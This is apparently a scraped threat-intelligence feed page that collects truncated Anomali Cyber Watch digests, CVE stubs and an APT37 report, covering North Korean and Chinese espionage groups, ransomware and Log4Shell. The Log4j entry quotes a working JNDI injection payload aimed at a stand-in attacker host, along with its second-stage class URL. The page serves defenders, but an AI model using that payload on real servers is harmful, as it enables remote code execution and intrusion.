ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] OS Credential Dumping - T1003 \| [MITRE ATT&CK] Phishing - T1566 \|	Ransomware Hack Tool Vulnerability Threat Guideline Cloud	APT 37 APT 29 LastPass
	2022-08-06 10:46:21	CISO workshop slides (lien direct)	A glossy, nicely-constructed and detailed PowerPoint slide deck by Microsoft Security caught my beady this morning. The title 'CISO Workshop: Security Program and Strategy' with 'Your Name Here' suggests it might be a template for use in a workshop/course bringing CISOs up to speed on the governance, strategic and architectural aspects of information security, but in fact given the amount of technical detail, it appears to be aimed at informing IT/technology managers about IT or cybersecurity, specifically. Maybe it is intended for newly-appointed CISOs or more junior managers who aspire to be CISOs, helping them clamber up the pyramid (slide 87 of 142):	Malware Vulnerability Threat Patching Guideline Medical Cloud	Uber APT 38 APT 37 APT 28 APT 19 APT 15 APT 10 APT 34 Guam
	2022-08-02 15:17:00	Anomali Cyber Watch: Velvet Chollima Steals Emails from Browsers, Austrian Mercenary Leverages Zero-Days, China-Sponsored Group Uses CosmicStrand UEFI Firmware Rootkit, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyber mercenaries, Phishing, Rootkits, Spyware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence SharpTongue Deploys Clever Mail-Stealing Browser Extension “SHARPEXT” (published: July 28, 2022) Volexity researchers discovered SharpExt, a new malicious browser app used by the North-Korea sponsored Velvet Chollima (Kimsuky, SharpTongue, Thallium) group. SharpExt inspects and exfiltrates data from a victim's webmail (AOL or Gmail) account as they browse it. Velvet Chollima continues to add new features to the app, the latest known version (3.0) supports three browsers: Microsoft Edge, Google Chrome, and Whale, the latter almost exclusively used in South Korea. Following the initial compromise, Velvet Chollima deploy SharpExt and to avoid warning the victim they manually exfiltrate settings files to change the settings and generate a valid "super_mac" security check value. They also hide the newly opened DevTools window and any other warning windows such as a warning regarding extensions running in developer mode. Analyst Comment: Velvet Chollima is known for its tactic of deploying malicious browser extensions, but in the past it was concentrating on stealing credentials instead of emails. The group continues aggressive cyberespionage campaigns exfiltrating military and industrial technologies from Europe, South Korea, and the US. Network defenders should monitor for suspicious instances of PowerShell execution, as well as for traffic to and from known Velvet Chollima infrastructure (available in Anomali Match). MITRE ATT&CK: [MITRE ATT&CK] Browser Extensions - T1176 \| [MITRE ATT&CK] Email Collection - T1114 \| [MITRE ATT&CK] Command and Scripting Interpreter - T1059 \| [MITRE ATT&CK] Hide Artifacts - T1564 Tags: SharpExt, Velvet Chollima, Kimsuky, SharpTongue, Thallium, APT, North Korea, source-country:KP, South Korea, target-country:KR, USA, target-country:US, target-region:Europe, AOL, Gmail, Edge, Chrome, Whale, PowerShell, VBS, Browser extension Untangling KNOTWEED: European Private-Sector Offensive Actor Using 0-Day Exploits (published: July 27, 2022) Microsoft researchers detail activity of DSIRF, Austrian private-sector offensive actor (PSOA). In 2021, this actor, tracked as Knotweed, used four Windows and Adobe 0-day exploits. In 2022, DSIRF was exploiting another Adobe Reader vulnerability, CVE-2022-22047, which was patched in July 2022. DSIRF attacks rely on their malware toolset called Subzero. The initial downloader shellcode is executed from either the exploit chains or malicious Excel documents. It downloads a JPG image file with extra encrypted data, extracts, decrypts and loads to the memory the Corelump memory-only infostealer. For persistence, Corelump creates trojanized copies of legitimate Windows DLLs that se	Malware Tool Vulnerability Threat Patching Guideline Cloud	APT 37 APT 28
	2022-05-03 16:31:00	Anomali Cyber Watch: Time-to-Ransom Under Four Hours, Mustang Panda Spies on Russia, Ricochet Chollima Sends Goldbackdoor to Journalists, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, Cyberespionage, LNK files, Malspam, North Korea, Phishing, Ransomware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence A Lookback Under the TA410 Umbrella: Its Cyberespionage TTPs and Activity (published: April 28, 2022) ESET researchers found three different teams under China-sponsored umbrella cyberespionage group TA410, which is loosely linked to Stone Panda (APT10, Chinese Ministry of State Security). ESET named these teams FlowingFrog, JollyFrog, and LookingFrog. FlowingFrog uses the Royal Road RTF weaponizer described by Anomali in 2019. Infection has two stages: the Tendyron implant followed by a very complex FlowCloud backdoor. JollyFrog uses generic malware such as PlugX and QuasarRAT. LookingFrog’s infection stages feature the X4 backdoor followed by the LookBack backdoor. Besides using different backdoors and exiting from IP addresses located in three different districts, the three teams use similar tools and similar tactics, techniques, and procedures (TTPs). Analyst Comment: Organizations should keep their web-facing applications such as Microsoft Exchange or SharePoint secured and updated. Educate your employees on handling suspected spearphishing attempts. Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] Phishing - T1566 \| [MITRE ATT&CK] Native API - T1106 \| [MITRE ATT&CK] Shared Modules - T1129 \| [MITRE ATT&CK] Exploitation for Client Execution - T1203 \| [MITRE ATT&CK] Inter-Process Communication - T1559 \| [MITRE ATT&CK] Windows Management Instrumentation - T1047 \| [MITRE ATT&CK] Scheduled Task - T1053 \| [MITRE ATT&CK] Server Software Component - T1505 \| [MITRE ATT&CK] Create or Modify System Process - T1543 \| [MITRE ATT&CK] Obfuscated Files or Information - T1027 \| [MITRE ATT&CK] Masquerading - T1036 \| [MITRE ATT&CK] Masquerading - T1036 \| [MITRE ATT&CK] Rootkit - T1014 \| [MITRE ATT&CK] Process Injection - T1055 \|	Ransomware Malware Tool Vulnerability Threat Guideline Cloud	APT 37 APT 10 APT 10
	2022-04-28 17:15:39	CVE-2022-29411 (lien direct)	SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin	Vulnerability Cloud	APT 37
	2022-04-28 17:15:38	CVE-2022-29410 (lien direct)	Authenticated SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin	Vulnerability Cloud	APT 37
	2021-12-15 16:00:00	Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] Exploitation for Client Execution - T1203 \| [MITRE ATT&CK] Command and Scripting Interpreter - T1059 \| [MITRE ATT&CK] Remote Services - T1021 \| [MITRE ATT&CK] OS Credential Dumping - T1003 \| [MITRE ATT&CK] Resource Hijacking - T1496 \| [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1	Malware Tool Vulnerability Threat Cloud	APT 37 APT 29 APT 15 APT 15 APT 25
	2021-12-07 16:04:00	Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New Malware Hides as Legit Nginx Process on E-Commerce Servers (published: December 2, 2021) Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity. MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 \| [MITRE ATT&CK] Shared Modules - T1129 Tags: NginRAT, CronRAT, Nginx, North America, EU How Phishing Kits Are Enabling A New Legion Of Pro Phishers (published: December 2, 2021) Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested. Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel. Tags: Phishing, XBATLI Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors (pub	Ransomware Malware Tool Vulnerability Threat Cloud	APT 37	★★★★
	2021-08-24 17:11:00	Anomali Cyber Watch: ProxyShell Being Exploited to Install Webshells and Ransomware, Neurevt Trojan Targeting Mexican Users, Secret Terrorist Watchlist Exposed, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT37 (InkySquid), BlueLight, Ransomware, T-Mobile Data Breach, Critical Vulnerabilities, IoT, Kalay, Neurevt, and ProxyShell. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag. Trending Cyber News and Threat Intelligence Microsoft Exchange Servers Still Vulnerable to ProxyShell Exploit (published: August 23, 2021) Despite patches a collection of vulnerabilities (ProxyShell) discovered in Microsoft Exchange being available in the July 2021 update, researchers discovered nearly 2,000 of these vulnerabilities have recently been compromised to host webshells. These webshells allow for attackers to retain backdoor access to compromised servers for further exploitation and lateral movement into the affected organizations. Researchers believe that these attacks may be related to the recent LockFile ransomware attacks. Analyst Comment: Organizations running Microsoft Exchange are strongly encouraged to prioritize updates to prevent ongoing exploitation of these vulnerabilities. In addition, a thorough investigation to discover and remove planted webshells should be undertaken as the patches will not remove planted webshells in their environments. A threat intelligence platform (TIP) such as Anomali Threatstream can be a valuable tool to assist organizations ingesting current indicators of compromise (IOCs) and determine whether their Exchange instances have been compromised. MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 \| [MITRE ATT&CK] Web Shell - T1100 \| [MITRE ATT&CK] Hidden Files and Directories - T1158 \| [MITRE ATT&CK] Source - T1153 Tags: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, Exchange, ProxyShell, backdoor LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers (published: August 20, 2021) A new ransomware family, named Lockfile by Symantec researchers, has been observed on the network of a US financial organization. The first known instance of this ransomware was July 20, 2021, and activity is ongoing. This ransomware has been seen largely targeting organizations in a wide range of industries across the US and Asia. The initial access vector remains unknown at this time, but the ransomware leverages the incompletely patched PetitPotam vulnerability (CVE-2021-36942) in Microsoft's Exchange Server to pivot to Domain Controllers (DCs) which are then leveraged to deploy ransomware tools to devices that connect to the DC. The attackers appear to remain resident on the network for several	Ransomware Malware Tool Vulnerability Threat Patching Cloud	APT 37
	2018-02-20 13:30:00	APT37 (Reaper): l'acteur nord-coréen négligé APT37 (Reaper): The Overlooked North Korean Actor (lien direct)	Le 2 février 2018, nous avons publié un Blog détaillant l'utilisation d'une vulnérabilité Adobe Flash Zero-Day (CVE-2018-4878) par un groupe de cyber-espionnage nord-coréen présumé que nous suivons maintenant comme APT37 (Reaper). Notre analyse de l'activité récente d'APT37 \\ révèle que les opérations du groupe \\ se développent en portée et en sophistication, avec un ensemble d'outils qui comprend l'accès aux vulnérabilités zéro-jour et aux logiciels malveillants d'essuie-glace.Nous évaluons avec une grande confiance que cette activité est réalisée au nom du gouvernement nord-coréen compte tenu des artefacts de développement de logiciels malveillants et ciblant qui s'aligne sur l'État nord-coréen On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper). Our analysis of APT37\'s recent activity reveals that the group\'s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state	Malware Vulnerability	APT 37 APT 37	★★★★

Last update at: 2025-05-10 18:07:56
See our sources.

To see everything: Our RSS (filtrered)